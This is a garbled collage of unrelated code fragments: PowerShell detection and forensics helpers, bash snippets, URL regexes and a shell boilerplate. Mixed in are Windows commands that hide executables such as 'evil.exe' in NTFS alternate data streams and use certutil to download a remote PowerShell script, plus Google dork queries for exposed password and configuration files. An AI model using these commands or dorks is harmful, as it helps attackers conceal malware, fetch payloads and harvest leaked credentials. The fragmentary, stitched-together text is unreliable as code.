| import requests | |
| import json | |
| import time | |
| import argparse | |
| import getpass | |
| import os | |
| import sys | |
| def main(): |
| function Scan-LOLDrivers { | |
| param( | |
| [Parameter(Mandatory = $true)] | |
| [string]$path | |
| ) | |
| Add-Type -TypeDefinition @" | |
| using System; | |
| using System.Security.Cryptography; | |
| using System.Security.Cryptography.X509Certificates; |
| #!/bin/bash | |
| while :; do | |
| verf=$(cat /dev/urandom | tr -dc '0-9' | fold -w 8 | head -n 1) | |
| pin=$(cat /dev/urandom | tr -dc '0-9' | fold -w 5 | head -n 1) | |
| ip=$(printf "%d.%d.%d.%d\n" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))") | |
| # 20161122 https://github.com/ConradIrwin/rxxr2/blob/master/data/input/regexlib-raw.txt http://www.cs.bham.ac.uk/~hxt/research/rxxr2/ | |
| # This will find URLs in plain text. With or without protocol. It matches against all toplevel domains to find the URL in the text. | |
| # ID: 1016 | |
| ([\d\w-.]+?\.(a[cdefgilmnoqrstuwz]|b[abdefghijmnorstvwyz]|c[acdfghiklmnoruvxyz]|d[ejkmnoz]|e[ceghrst]|f[ijkmnor]|g[abdefghilmnpqrstuwy]|h[kmnrtu]|i[delmnoqrst]|j[emop]|k[eghimnprwyz]|l[abcikrstuvy]|m[acdghklmnopqrstuvwxyz]|n[acefgilopruz]|om|p[aefghklmnrstwy]|qa|r[eouw]|s[abcdeghijklmnortuvyz]|t[cdfghjkmnoprtvwz]|u[augkmsyz]|v[aceginu]|w[fs]|y[etu]|z[amw]|aero|arpa|biz|com|coop|edu|info|int|gov|mil|museum|name|net|org|pro)(\b|\W(?<!&|=)(?!\.\s|\.{3}).*?))(\s|$) | |
| # Retrieves all anchor links in a html document, useful for spidering. You will need to do a replace of " and ' after the regular expression, as the expression gets all links. As far as I know there is no way, even with \1 groupings, of getting a condition on whether the link |
| filter Expand-DefenderAVSignatureDB { | |
| <# | |
| .SYNOPSIS | |
| Decompresses a Windows Defender AV signature database (.VDM file). | |
| .DESCRIPTION | |
| Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed. |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |
| admin account info" filetype:log | |
| !Host=*.* intext:enc_UserPassword=* ext:pcf | |
| "# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd | |
| "AutoCreate=TRUE password=*" | |
| "http://*:*@www” domainname | |
| "index of/" "ws_ftp.ini" "parent directory" | |
| "liveice configuration file" ext:cfg -site:sourceforge.net | |
| "parent directory" +proftpdpasswd | |
| Duclassified" -site:duware.com "DUware All Rights reserved" | |
| duclassmate" -site:duware.com |
| #!/bin/bash | |
| # SPDX-License-Identifier: MIT | |
| ## Copyright (C) 2009 Przemyslaw Pawelczyk <przemoc@gmail.com> | |
| ## | |
| ## This script is licensed under the terms of the MIT license. | |
| ## https://opensource.org/licenses/MIT | |
| # | |
| # Lockable script boilerplate | |
